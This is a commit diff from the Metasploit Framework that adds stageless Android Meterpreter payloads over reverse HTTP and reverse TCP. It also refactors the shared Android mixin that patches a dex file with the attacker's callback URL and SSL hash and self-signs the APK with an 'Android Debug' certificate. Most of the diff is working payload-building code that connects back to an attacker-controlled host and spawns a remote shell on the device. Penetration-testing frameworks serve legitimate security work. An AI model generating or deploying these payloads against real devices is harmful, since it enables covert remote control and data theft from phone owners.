Land #7292, android stageless with new payload gem
commit
21ec4915a7
|
@ -14,7 +14,7 @@ PATH
|
|||
metasploit-concern
|
||||
metasploit-credential
|
||||
metasploit-model
|
||||
metasploit-payloads (= 1.1.15)
|
||||
metasploit-payloads (= 1.1.16)
|
||||
metasploit_data_models
|
||||
metasploit_payloads-mettle (= 0.0.6)
|
||||
msgpack
|
||||
|
@ -167,7 +167,7 @@ GEM
|
|||
activemodel (~> 4.2.6)
|
||||
activesupport (~> 4.2.6)
|
||||
railties (~> 4.2.6)
|
||||
metasploit-payloads (1.1.15)
|
||||
metasploit-payloads (1.1.16)
|
||||
metasploit_data_models (2.0.1)
|
||||
activerecord (~> 4.2.6)
|
||||
activesupport (~> 4.2.6)
|
||||
|
|
|
@ -414,8 +414,6 @@ protected
|
|||
url = payload_uri(req) + conn_id
|
||||
url << '/' unless url[-1] == '/'
|
||||
|
||||
p url
|
||||
|
||||
# Short-circuit the payload's handle_connection processing for create_session
|
||||
create_session(cli, {
|
||||
:passive_dispatcher => self.service,
|
||||
|
|
|
@ -28,7 +28,7 @@ class Payload < Msf::Module
|
|||
require 'msf/core/payload/windows'
|
||||
require 'msf/core/payload/netware'
|
||||
require 'msf/core/payload/java'
|
||||
require 'msf/core/payload/dalvik'
|
||||
require 'msf/core/payload/android'
|
||||
require 'msf/core/payload/firefox'
|
||||
require 'msf/core/payload/mainframe'
|
||||
|
||||
|
|
|
@ -1,7 +1,12 @@
|
|||
# -*- coding: binary -*-
|
||||
require 'msf/core'
|
||||
require 'msf/core/payload/uuid/options'
|
||||
require 'msf/core/payload/transport_config'
|
||||
|
||||
module Msf::Payload::Dalvik
|
||||
module Msf::Payload::Android
|
||||
|
||||
include Msf::Payload::TransportConfig
|
||||
include Msf::Payload::UUID::Options
|
||||
|
||||
#
|
||||
# Fix the dex header checksum and signature
|
||||
|
@ -31,25 +36,53 @@ module Msf::Payload::Dalvik
|
|||
[str.length].pack("N") + str
|
||||
end
|
||||
|
||||
def apply_options(classes)
|
||||
def apply_options(classes, opts)
|
||||
timeouts = [
|
||||
datastore['SessionExpirationTimeout'].to_s,
|
||||
datastore['SessionCommunicationTimeout'].to_s,
|
||||
datastore['SessionRetryTotal'].to_s,
|
||||
datastore['SessionRetryWait'].to_s
|
||||
].join('-')
|
||||
string_sub(classes, 'TTTT ', 'TTTT' + timeouts)
|
||||
if opts[:stageless]
|
||||
config = generate_config_hex(opts)
|
||||
string_sub(classes, 'UUUU' + ' ' * 8191, 'UUUU' + config)
|
||||
end
|
||||
if opts[:ssl]
|
||||
verify_cert_hash = get_ssl_cert_hash(datastore['StagerVerifySSLCert'],
|
||||
datastore['HandlerSSLCert'])
|
||||
if verify_cert_hash
|
||||
hash = 'WWWW' + verify_cert_hash.unpack("H*").first
|
||||
string_sub(classes, 'WWWW ', hash)
|
||||
end
|
||||
end
|
||||
string_sub(classes, 'ZZZZ' + ' ' * 512, 'ZZZZ' + payload_uri)
|
||||
string_sub(classes, 'TTTT' + ' ' * 48, 'TTTT' + timeouts)
|
||||
end
|
||||
|
||||
def generate_config_hex(opts={})
|
||||
opts[:uuid] ||= generate_payload_uuid
|
||||
|
||||
config_opts = {
|
||||
ascii_str: true,
|
||||
arch: opts[:uuid].arch,
|
||||
expiration: datastore['SessionExpirationTimeout'].to_i,
|
||||
uuid: opts[:uuid],
|
||||
transports: [transport_config(opts)]
|
||||
}
|
||||
|
||||
config = Rex::Payloads::Meterpreter::Config.new(config_opts)
|
||||
config.to_b.unpack('H*').first
|
||||
end
|
||||
|
||||
def string_sub(data, placeholder="", input="")
|
||||
data.gsub!(placeholder, input + ' ' * (placeholder.length - input.length))
|
||||
end
|
||||
|
||||
def generate_cert
|
||||
def sign_jar(jar)
|
||||
x509_name = OpenSSL::X509::Name.parse(
|
||||
"C=Unknown/ST=Unknown/L=Unknown/O=Unknown/OU=Unknown/CN=Unknown"
|
||||
"C=US/O=Android/CN=Android Debug"
|
||||
)
|
||||
key = OpenSSL::PKey::RSA.new(1024)
|
||||
key = OpenSSL::PKey::RSA.new(2048)
|
||||
cert = OpenSSL::X509::Certificate.new
|
||||
cert.version = 2
|
||||
cert.serial = 1
|
||||
|
@ -74,7 +107,32 @@ module Msf::Payload::Dalvik
|
|||
# If this line is left out, signature verification fails on OSX.
|
||||
cert.sign(key, OpenSSL::Digest::SHA1.new)
|
||||
|
||||
return cert, key
|
||||
jar.sign(key, cert, [cert])
|
||||
end
|
||||
|
||||
def generate_jar(opts={})
|
||||
if opts[:stageless]
|
||||
classes = MetasploitPayloads.read('android', 'meterpreter.dex')
|
||||
else
|
||||
classes = MetasploitPayloads.read('android', 'apk', 'classes.dex')
|
||||
end
|
||||
|
||||
apply_options(classes, opts)
|
||||
|
||||
jar = Rex::Zip::Jar.new
|
||||
files = [
|
||||
[ "AndroidManifest.xml" ],
|
||||
[ "resources.arsc" ]
|
||||
]
|
||||
jar.add_files(files, MetasploitPayloads.path("android", "apk"))
|
||||
jar.add_file("classes.dex", fix_dex_header(classes))
|
||||
jar.build_manifest
|
||||
|
||||
sign_jar(jar)
|
||||
|
||||
jar
|
||||
end
|
||||
|
||||
|
||||
end
|
||||
|
|
@ -65,7 +65,7 @@ Gem::Specification.new do |spec|
|
|||
# are needed when there's no database
|
||||
spec.add_runtime_dependency 'metasploit-model'
|
||||
# Needed for Meterpreter
|
||||
spec.add_runtime_dependency 'metasploit-payloads', '1.1.15'
|
||||
spec.add_runtime_dependency 'metasploit-payloads', '1.1.16'
|
||||
# Needed for the next-generation POSIX Meterpreter
|
||||
spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.0.6'
|
||||
# Needed by msfgui and other rpc components
|
||||
|
|
|
@ -0,0 +1,70 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
require 'msf/core/handler/reverse_http'
|
||||
require 'msf/core/payload/transport_config'
|
||||
require 'msf/core/payload/android'
|
||||
require 'msf/core/payload/uuid/options'
|
||||
require 'msf/base/sessions/meterpreter_android'
|
||||
require 'msf/base/sessions/meterpreter_options'
|
||||
require 'rex/payloads/meterpreter/config'
|
||||
|
||||
module MetasploitModule
|
||||
|
||||
CachedSize = :dynamic
|
||||
|
||||
include Msf::Payload::TransportConfig
|
||||
include Msf::Payload::Single
|
||||
include Msf::Payload::Android
|
||||
include Msf::Payload::UUID::Options
|
||||
include Msf::Sessions::MeterpreterOptions
|
||||
|
||||
|
||||
def initialize(info = {})
|
||||
|
||||
super(merge_info(info,
|
||||
'Name' => 'Android Meterpreter Shell, Reverse HTTP Inline',
|
||||
'Description' => 'Connect back to attacker and spawn a Meterpreter shell',
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => 'android',
|
||||
'Arch' => ARCH_DALVIK,
|
||||
'Handler' => Msf::Handler::ReverseHttp,
|
||||
'Session' => Msf::Sessions::Meterpreter_Java_Android,
|
||||
'Payload' => '',
|
||||
))
|
||||
register_options([
|
||||
OptBool.new('AutoLoadAndroid', [true, "Automatically load the Android extension", true])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
#
|
||||
# Generate the transport-specific configuration
|
||||
#
|
||||
def transport_config(opts={})
|
||||
transport_config_reverse_http(opts)
|
||||
end
|
||||
|
||||
def generate_jar(opts={})
|
||||
opts[:stageless] = true
|
||||
super(opts)
|
||||
end
|
||||
|
||||
def payload_uri(req=nil)
|
||||
# Default URL length is 30-256 bytes
|
||||
uri_req_len = 30 + luri.length + rand(256 - (30 + luri.length))
|
||||
# Generate the short default URL if we don't know available space
|
||||
if self.available_space.nil?
|
||||
uri_req_len = 5
|
||||
end
|
||||
|
||||
url = "http://#{datastore["LHOST"]}:#{datastore["LPORT"]}#{luri}"
|
||||
# TODO: perhaps wire in an existing UUID from opts?
|
||||
url << generate_uri_uuid_mode(:init_connect, uri_req_len)
|
||||
|
||||
url
|
||||
end
|
||||
|
||||
end
|
|
@ -0,0 +1,49 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
require 'msf/core'
|
||||
require 'msf/core/payload/android'
|
||||
require 'msf/core/payload/transport_config'
|
||||
require 'msf/base/sessions/meterpreter_android'
|
||||
require 'msf/base/sessions/meterpreter_options'
|
||||
require 'rex/payloads/meterpreter/config'
|
||||
|
||||
module MetasploitModule
|
||||
|
||||
CachedSize = :dynamic
|
||||
|
||||
include Msf::Payload::TransportConfig
|
||||
include Msf::Payload::Single
|
||||
include Msf::Payload::Android
|
||||
include Msf::Sessions::MeterpreterOptions
|
||||
|
||||
def initialize(info = {})
|
||||
super(merge_info(info,
|
||||
'Name' => 'Android Meterpreter Shell, Reverse TCP Inline',
|
||||
'Description' => 'Connect back to the attacker and spawn a Meterpreter shell',
|
||||
'Platform' => 'android',
|
||||
'Arch' => ARCH_DALVIK,
|
||||
'License' => MSF_LICENSE,
|
||||
'Handler' => Msf::Handler::ReverseTcp,
|
||||
'Session' => Msf::Sessions::Meterpreter_Java_Android,
|
||||
'Payload' => '',
|
||||
))
|
||||
register_options([
|
||||
OptBool.new('AutoLoadAndroid', [true, "Automatically load the Android extension", true])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
#
|
||||
# Generate the transport-specific configuration
|
||||
#
|
||||
def transport_config(opts={})
|
||||
transport_config_reverse_tcp(opts)
|
||||
end
|
||||
|
||||
def generate_jar(opts={})
|
||||
opts[:stageless] = true
|
||||
super(opts)
|
||||
end
|
||||
|
||||
end
|
|
@ -12,12 +12,12 @@ module MetasploitModule
|
|||
CachedSize = :dynamic
|
||||
|
||||
include Msf::Payload::Stager
|
||||
include Msf::Payload::Dalvik
|
||||
include Msf::Payload::Android
|
||||
include Msf::Payload::UUID::Options
|
||||
|
||||
def initialize(info = {})
|
||||
super(merge_info(info,
|
||||
'Name' => 'Dalvik Reverse HTTP Stager',
|
||||
'Name' => 'Android Reverse HTTP Stager',
|
||||
'Description' => 'Tunnel communication over HTTP',
|
||||
'Author' => ['anwarelmakrahy', 'OJ Reeves'],
|
||||
'License' => MSF_LICENSE,
|
||||
|
@ -28,7 +28,14 @@ module MetasploitModule
|
|||
))
|
||||
end
|
||||
|
||||
def generate_jar(opts={})
|
||||
#
|
||||
# Generate the transport-specific configuration
|
||||
#
|
||||
def transport_config(opts={})
|
||||
transport_config_reverse_http(opts)
|
||||
end
|
||||
|
||||
def payload_uri(req=nil)
|
||||
# Default URL length is 30-256 bytes
|
||||
uri_req_len = 30 + luri.length + rand(256 - (30 + luri.length))
|
||||
# Generate the short default URL if we don't know available space
|
||||
|
@ -40,23 +47,7 @@ module MetasploitModule
|
|||
# TODO: perhaps wire in an existing UUID from opts?
|
||||
url << generate_uri_uuid_mode(:init_java, uri_req_len)
|
||||
|
||||
classes = MetasploitPayloads.read('android', 'apk', 'classes.dex')
|
||||
string_sub(classes, 'ZZZZ' + ' ' * 512, 'ZZZZ' + url)
|
||||
apply_options(classes)
|
||||
|
||||
jar = Rex::Zip::Jar.new
|
||||
jar.add_file("classes.dex", fix_dex_header(classes))
|
||||
files = [
|
||||
[ "AndroidManifest.xml" ],
|
||||
[ "resources.arsc" ]
|
||||
]
|
||||
jar.add_files(files, MetasploitPayloads.path("android", "apk"))
|
||||
jar.build_manifest
|
||||
|
||||
cert, key = generate_cert
|
||||
jar.sign(key, cert, [cert])
|
||||
|
||||
jar
|
||||
url
|
||||
end
|
||||
|
||||
end
|
||||
|
|
|
@ -12,12 +12,12 @@ module MetasploitModule
|
|||
CachedSize = :dynamic
|
||||
|
||||
include Msf::Payload::Stager
|
||||
include Msf::Payload::Dalvik
|
||||
include Msf::Payload::Android
|
||||
include Msf::Payload::UUID::Options
|
||||
|
||||
def initialize(info = {})
|
||||
super(merge_info(info,
|
||||
'Name' => 'Dalvik Reverse HTTPS Stager',
|
||||
'Name' => 'Android Reverse HTTPS Stager',
|
||||
'Description' => 'Tunnel communication over HTTPS',
|
||||
'Author' => ['anwarelmakrahy', 'OJ Reeves'],
|
||||
'License' => MSF_LICENSE,
|
||||
|
@ -29,8 +29,13 @@ module MetasploitModule
|
|||
end
|
||||
|
||||
def generate_jar(opts={})
|
||||
opts[:ssl] = true
|
||||
super(opts)
|
||||
end
|
||||
|
||||
def payload_uri(req=nil)
|
||||
# Default URL length is 30-256 bytes
|
||||
uri_req_len = 30 + rand(256-30)
|
||||
uri_req_len = 30 + luri.length + rand(256 - (30 + luri.length))
|
||||
# Generate the short default URL if we don't know available space
|
||||
if self.available_space.nil?
|
||||
uri_req_len = 5
|
||||
|
@ -40,30 +45,8 @@ module MetasploitModule
|
|||
# TODO: perhaps wire in an existing UUID from opts?
|
||||
url << generate_uri_uuid_mode(:init_java, uri_req_len)
|
||||
|
||||
classes = MetasploitPayloads.read('android', 'apk', 'classes.dex')
|
||||
string_sub(classes, 'ZZZZ' + ' ' * 512, 'ZZZZ' + url)
|
||||
|
||||
verify_cert_hash = get_ssl_cert_hash(datastore['StagerVerifySSLCert'],
|
||||
datastore['HandlerSSLCert'])
|
||||
if verify_cert_hash
|
||||
hash = 'WWWW' + verify_cert_hash.unpack("H*").first
|
||||
string_sub(classes, 'WWWW ', hash)
|
||||
url
|
||||
end
|
||||
|
||||
apply_options(classes)
|
||||
|
||||
jar = Rex::Zip::Jar.new
|
||||
jar.add_file("classes.dex", fix_dex_header(classes))
|
||||
files = [
|
||||
[ "AndroidManifest.xml" ],
|
||||
[ "resources.arsc" ]
|
||||
]
|
||||
jar.add_files(files, MetasploitPayloads.path("android", "apk"))
|
||||
jar.build_manifest
|
||||
|
||||
cert, key = generate_cert
|
||||
jar.sign(key, cert, [cert])
|
||||
|
||||
jar
|
||||
end
|
||||
end
|
||||
|
|
|
@ -6,6 +6,7 @@
|
|||
require 'metasploit-payloads'
|
||||
require 'msf/core'
|
||||
require 'msf/core/handler/reverse_tcp'
|
||||
require 'msf/core/payload/transport_config'
|
||||
require 'msf/base/sessions/command_shell'
|
||||
require 'msf/base/sessions/command_shell_options'
|
||||
|
||||
|
@ -14,11 +15,13 @@ module MetasploitModule
|
|||
CachedSize = :dynamic
|
||||
|
||||
include Msf::Payload::Stager
|
||||
include Msf::Payload::Dalvik
|
||||
include Msf::Payload::TransportConfig
|
||||
include Msf::Payload::Android
|
||||
include Msf::Payload::UUID::Options
|
||||
|
||||
def initialize(info = {})
|
||||
super(merge_info(info,
|
||||
'Name' => 'Dalvik Reverse TCP Stager',
|
||||
'Name' => 'Android Reverse TCP Stager',
|
||||
'Description' => 'Connect back stager',
|
||||
'Author' => ['timwr', 'OJ Reeves'],
|
||||
'License' => MSF_LICENSE,
|
||||
|
@ -29,33 +32,11 @@ module MetasploitModule
|
|||
))
|
||||
end
|
||||
|
||||
def include_send_uuid
|
||||
false
|
||||
end
|
||||
|
||||
def generate_jar(opts={})
|
||||
jar = Rex::Zip::Jar.new
|
||||
|
||||
classes = MetasploitPayloads.read('android', 'apk', 'classes.dex')
|
||||
|
||||
url = "tcp://#{datastore['LHOST']}:#{datastore['LPORT']}"
|
||||
string_sub(classes, 'ZZZZ' + ' ' * 512, 'ZZZZ' + url)
|
||||
apply_options(classes)
|
||||
|
||||
jar.add_file("classes.dex", fix_dex_header(classes))
|
||||
|
||||
files = [
|
||||
[ "AndroidManifest.xml" ],
|
||||
[ "resources.arsc" ]
|
||||
]
|
||||
|
||||
jar.add_files(files, MetasploitPayloads.path("android", "apk"))
|
||||
jar.build_manifest
|
||||
|
||||
cert, key = generate_cert
|
||||
jar.sign(key, cert, [cert])
|
||||
|
||||
jar
|
||||
#
|
||||
# Generate the transport-specific configuration
|
||||
#
|
||||
def transport_config(opts={})
|
||||
transport_config_reverse_tcp(opts)
|
||||
end
|
||||
|
||||
end
|
||||
|
|
|
@ -4,7 +4,7 @@
|
|||
##
|
||||
|
||||
require 'msf/core'
|
||||
require 'msf/core/payload/dalvik'
|
||||
require 'msf/core/payload/android'
|
||||
require 'msf/base/sessions/meterpreter_android'
|
||||
require 'msf/base/sessions/meterpreter_options'
|
||||
require 'rex/payloads/meterpreter/config'
|
||||
|
@ -30,7 +30,7 @@ module MetasploitModule
|
|||
end
|
||||
|
||||
#
|
||||
# Override the Payload::Dalvik version so we can load a prebuilt jar to be
|
||||
# Override the Payload::Android version so we can load a prebuilt jar to be
|
||||
# used as the final stage
|
||||
#
|
||||
def generate_stage(opts={})
|
||||
|
|
|
@ -4,7 +4,7 @@
|
|||
##
|
||||
|
||||
require 'msf/core'
|
||||
require 'msf/core/payload/dalvik'
|
||||
require 'msf/core/payload/android'
|
||||
require 'msf/core/handler/reverse_tcp'
|
||||
require 'msf/base/sessions/command_shell'
|
||||
require 'msf/base/sessions/command_shell_options'
|
||||
|
@ -31,7 +31,7 @@ module MetasploitModule
|
|||
end
|
||||
|
||||
#
|
||||
# Override the {Payload::Dalvik} version so we can load a prebuilt jar
|
||||
# Override the {Payload::Android} version so we can load a prebuilt jar
|
||||
# to be used as the final stage
|
||||
#
|
||||
def generate_stage(opts={})
|
||||
|
|
|
@ -45,6 +45,26 @@ RSpec.describe 'modules/payloads', :content do
|
|||
reference_name: 'aix/ppc/shell_reverse_tcp'
|
||||
end
|
||||
|
||||
context 'android/meterpreter_reverse_http' do
|
||||
it_should_behave_like 'payload cached size is consistent',
|
||||
ancestor_reference_names: [
|
||||
'singles/android/meterpreter_reverse_http'
|
||||
],
|
||||
dynamic_size: false,
|
||||
modules_pathname: modules_pathname,
|
||||
reference_name: 'android/meterpreter_reverse_http'
|
||||
end
|
||||
|
||||
context 'android/meterpreter_reverse_tcp' do
|
||||
it_should_behave_like 'payload cached size is consistent',
|
||||
ancestor_reference_names: [
|
||||
'singles/android/meterpreter_reverse_tcp'
|
||||
],
|
||||
dynamic_size: false,
|
||||
modules_pathname: modules_pathname,
|
||||
reference_name: 'android/meterpreter_reverse_tcp'
|
||||
end
|
||||
|
||||
context 'android/meterpreter/reverse_http' do
|
||||
it_should_behave_like 'payload cached size is consistent',
|
||||
ancestor_reference_names: [
|
||||
|
|
Loading…
Reference in New Issue